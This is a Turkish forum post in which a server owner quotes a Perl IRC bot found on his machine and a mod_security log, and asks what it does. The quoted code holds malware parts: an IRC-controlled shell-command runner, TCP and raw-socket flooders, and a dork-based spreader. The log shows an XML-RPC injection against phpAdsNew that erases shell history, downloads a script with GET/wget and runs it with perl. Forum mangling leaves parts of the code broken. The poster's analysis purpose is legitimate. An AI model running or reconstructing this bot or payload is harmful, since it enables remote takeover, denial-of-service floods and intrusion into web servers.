Yanıt: Bu nedir Acaba?




Alıntı:
# Bot command handler: runs the string in $_[1] as a shell command and relays
# its output, line by line, to the IRC target in $_[0].
#
# NOTE(review): this listing went through a forum that stripped '@' sigils --
# "my resp" / "foreach ... (resp)" are mangled copies of "my @resp" / "(@resp)"
# -- so the text is not runnable as shown.  $pid, $IRC_cur_socket, $linas_max
# and $sleep are package globals set in a configuration section that is not
# part of this page.
sub shell {
my $printl=$_[0];
my $comando=$_[1];
# "cd <dir>" is handled in-process so the bot's working directory persists.
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
# Double fork: the parent reaps the first child, which exits at once; the
# grandchild runs the command detached so the bot keeps serving IRC.
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
# The command text is interpolated straight into backticks, i.e. it is
# handed to /bin/sh unmodified: whatever the IRC controller sends runs
# with the privileges of the account the bot was started under (here,
# per the mod_security log below, the web server user).
my resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (resp) {
$c++;
chop $linha;
# Note the two-argument sendraw() here, whereas the IRC helpers further
# down call sendraw() with a single string.
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
# Flood throttle: after $linas_max lines, pause $sleep seconds so the IRC
# server does not disconnect the bot for excess flood.
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}

# Bot DoS primitive: for $_[2] seconds, opens up to 1000 TCP connections to
# host $_[0] / port $_[1] using the bareword handles SOCK0..SOCK999, then
# shuts them all down.  On the receiving side this is visible as a burst of
# connection attempts from a single source to a single port inside a fixed
# time window -- the same source that the mod_security log below shows
# being instructed to download and run this script.
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
# $ftime is not declared with "my": it is a package global that persists
# between calls.
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
# First pass: connect.  Stops early once the time budget is used up.
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
# $j ends up counting successful connects (decremented on failure, then
# incremented unconditionally); its value is never read.
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
# Second pass: shut down the same handles, again bounded by $ftime.
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}

# Bot DoS primitive: for $_[2] seconds, sends a payload of $_[1] bytes of 'A'
# to every port 1..65000 of host $_[0] over four sockets (protocol numbers
# 2 = IGMP, 17 = UDP, 1 = ICMP, 6 = TCP, which is what the %pacotes keys
# count) and over a fresh raw socket for every other protocol number 3..255
# (counted under key "o").  Three of the four fixed sockets are SOCK_RAW,
# which normally requires root / CAP_NET_RAW, so the returned counters also
# tell an analyst what privilege the bot was running with.
#
# Returns undef if none of the four sockets could be created, otherwise the
# elapsed time followed by %pacotes flattened into the return list.
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

# Bareword handles; $cp counts socket() failures.
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
# A send() on a failed (never-created) handle simply returns false and
# is not counted.
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

# Protocol 6 (TCP) is skipped because SOCK4 already covers it.  SOCK5 is
# re-created on every iteration and never closed.
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
# The inner "last" statements only leave their own loop, so the time
# budget is re-checked here to leave the outer while(1).
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}

# Send a CTCP request $_[1] to target $_[0]; silently does nothing unless
# called with exactly two arguments.  Note sendraw() takes one string here,
# unlike the two-argument call in shell().
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
# Send PRIVMSG $_[1] to target $_[0]; silently does nothing unless called
# with exactly two arguments.  Used by shell() to report chdir failures.
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
# Send NOTICE $_[1] to target $_[0]; silently does nothing unless called
# with exactly two arguments.
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
# Give channel operator status to nick $_[1] on channel $_[0]; silently does
# nothing unless called with exactly two arguments.
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
# Remove channel operator status from nick $_[1] on channel $_[0]; silently
# does nothing unless called with exactly two arguments.
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
# Short alias for join().  The forum stripped the '@' sigil: the original
# reads "&join(@_)", forwarding the caller's arguments (the "&" form is
# needed here because "join" is also a Perl built-in).
sub j { &join(_); }
# Join IRC channel $_[0]; silently does nothing unless called with exactly
# one argument.  This user sub shadows the built-in join() inside this
# package, which is why j() above calls it with the "&" prefix.
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
# Short alias for part().  The forum stripped the '@' sigil: the original
# reads "part(@_)".
sub p { part(_); }
# Leave IRC channel $_[0].  Unlike the other helpers there is no argument
# count check, so a missing argument sends "PART " with an empty channel.
sub part {
sendraw("PART $_[0]");
}
# Change the bot's nick to $_[0]; silently does nothing unless called with
# exactly one argument.
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
# Disconnect from IRC with quit message $_[0] (no argument count check;
# an undefined argument yields an empty quit message).
sub quit {
sendraw("QUIT :$_[0]");
}

# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#

# Spreader / target discovery.  Builds a search-engine query for the
# "inurl:modules.php?name=SQuery" dork (see the push() below) restricted to
# one TLD at a time from @dominios, fetches one result page with
# http_query() and returns the linked hosts/paths, minus any google, cache
# or translate links.  Each returned entry is a candidate victim for the
# exploit request shown in the mod_security log further down.
#
# NOTE(review): this copy is not runnable.  The forum stripped '@' sigils
# (dominios, str, lst), inserted spaces inside long strings where it wrapped
# them ("si te%3A", "pr o", " bi", ...), and replaced the search URL that
# followed "my $query=" with its own "you need 25 posts to see links"
# notice, so the exact endpoint and the use of $s are not recoverable here.
sub fetch(){
# Random result-page offset: $n is 80 or 160 (about 50/50), $s a multiple
# of it in 0..9*$n.  Presumably passed as the result "start" offset in the
# missing query URL -- cannot be confirmed from this copy.
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);

my dominios = ("com","net","org","info","gov", "gob","gub","xxx",
"eu","mil","edu","aero","name","us","ca","mx","pa" ,"ni","cu","pr","ve","co","pe","ec",

"py","cl","uy","ar","br","bo","au","nz","cz","kr", "jp","th","tw","ph","cn","fi","de","es","pt","ch", "se","su","it","gr","al","dk","pl","biz","int","pr o","museum","coop",

"af","ad","ao","ai","aq","ag","an","sa","dz","ar", "am","aw","at","az","bs","bh","bd","bb","be","bz", "bj","bm","bt","by","ba","bw","bn","bg","bf"," bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj", "dm","ci","cr","hr","kp","eg","sv","aw","er"," sk",

"ee","et","ge","fi","fr","ga","gs","gh","gi","gb", "uk","gd","gl","gp","gu","gt","gg","gn","gw","gq", "gy","gf","ht","nl","hn","hk","hu","in","id"," ir",

"iq","ie","is","ac","bv","cx","im","nf","ky","cc", "ck","fo","hm","fk","mp","mh","pw","um","sb","sj", "tc","vg","vi","wf","il","jm","je","jo","kz"," ke",

"ki","kg","kw","lv","ls","lb","ly","lr","li","lt", "lu","mo","mk","mg","my","mw","mv","ml","mt","mq", "ma","mr","mu","yt","md","mc","mn","ms","mz"," mm",

"na","nr","np","ni","ne","ng","nu","no","nc","om", "pk","ps","pg","pn","pf","qa","sy","cf","la","re", "rw","ro","ru","eh","kn","ws","as","sm","pm"," vc",

"sh","lc","va","st","sn","sc","sl","sg","so","lk", "za","sd","se","sr","sz","rj","tz","io","tf","tp", "tg","to","tt","tn","tr","tm","tv","ug","ua"," uz",
"vu","vn","ye","yu","cd","zm","zw","");
my str;

# One pre-encoded "dork site:<tld>" fragment per TLD.  $dom is not declared
# with "my", so it is a package global.
foreach $dom (dominios)
{
push (str,"%22inurl%3Amodules.php%3Fname%3DSQuery%22+si te%3A".$dom."%20");
}

my $query="
Bu forumdaki linkleri ve resimleri görebilmek için en az 25 mesajınız olması gerekir.
my lst=();
my $page = http_query($query);
# Result links are taken from anchors of the form <a class=l href="http://...">;
# only the part after "http://" is kept.
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (lst,$1);
}
}
return (lst);
}

# Minimal HTTP/1.0 client: GETs $url (port 80 only, 10-second alarm) and
# returns the raw response -- status line and headers included -- as one
# string, or "" on any failure or timeout.  The request line below
# ("HTTP/1.0", "Accept: */*", "User-Agent: Mozilla/5.0", no other headers)
# is a usable fingerprint for this spreader in web-server logs.
#
# NOTE(review): forum mangling again -- "my ($url) = _" was "= @_",
# "my r = <$sock>" was "my @r", and $page="r" was "@r" (lines joined with
# spaces).  The "($)" prototype only affects parsing, not validation.
sub http_query($){
my ($url) = _;
my $host=$url;
my $query=$url;
my $page="";
# Crude URL split: $host keeps the text up to the first "/", $query is
# whatever remains once $host is removed (defaults to "/").  $host is
# interpolated into the s/// unescaped.
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
# The ALRM handler dies out of the eval, which is how the timeout is
# implemented.  "or return" on the connect line leaves only the eval block,
# with the 10-second alarm still armed and $page still "".
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp" ) or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my r = <$sock>;
$page="r";
alarm 0;
close($sock);
};
return $page;

}
-- cut --




It looks like it's connecting to an IRC server specified in the configuration section. I've installed mod_security on that machine to track this issue (I thought it was a Mambo/Joomla clone), and this is a log from mod_security:



-- cut --
==820d6169==============================
Request: [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] 64.18.150.130 - - [17/Aug/2006:07:56:41 +0100] "POST /banmanagerold/adxmlrpc.php HTTP/1.1" 403 428 "-" "Internet Explorer 6.0" ROQTKVBXgIIAAHf6FiI "-"
----------------------------------------
POST /banmanagerold/adxmlrpc.php HTTP/1.1
Connection: TE, close
Content-Length: 557
Host: [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]
TE: deflate,gzip;q=0.3
User-Agent: Internet Explorer 6.0
mod_security-action: 403
mod_security-message: Access denied with code 403. Pattern match "(chr|fwrite|fopen|system|echr|passthru|popen|proc _open|shell_exec|exec|proc_nice|proc_terminate|pro c_get_status|proc_close|pfsockopen|leak|apache_chi ld_terminate|posix_kill|posix_mkfifo|posix_setpgid |posix_setsid|posix_setuid|phpinfo)\\(.*\\)\\;" at POST_PAYLOAD [id "300008"][rev "1"] [msg "Generic PHP exploit pattern denied"] [severity "CRITICAL"]

557
<?xml
version="1.0"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>',''));
system('unset HISTFILE;cd /tmp;GET [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] > top;perl top;mv top sess_2e04828799532f31e651238bda569ca7; wget [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] top;mv top sess_2e04828799532f31e651238bda569ca3'); die; /*</name></value></param></params></methodCall>

HTTP/1.1 403 Forbidden
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
--820d6169--
-- cut --

/banmanagerold/adxmlrpc.php is part of phpAdsNew (banner management software). The affected version I found on my server is phpAdsNew 2.0.4-pr2.

Arkadaşlar bu nedir? Ya da bu botun neye yaradığını çözemedim. Sanırım PHP dili ile yazılmış. Bunu çözebilecek var mı? Ya da bize bilgi verebilecek? (TEK MESAJA SIĞMIYORDU, ONDAN PARÇA PARÇA VERMEK ZORUNDA KALDIM)

 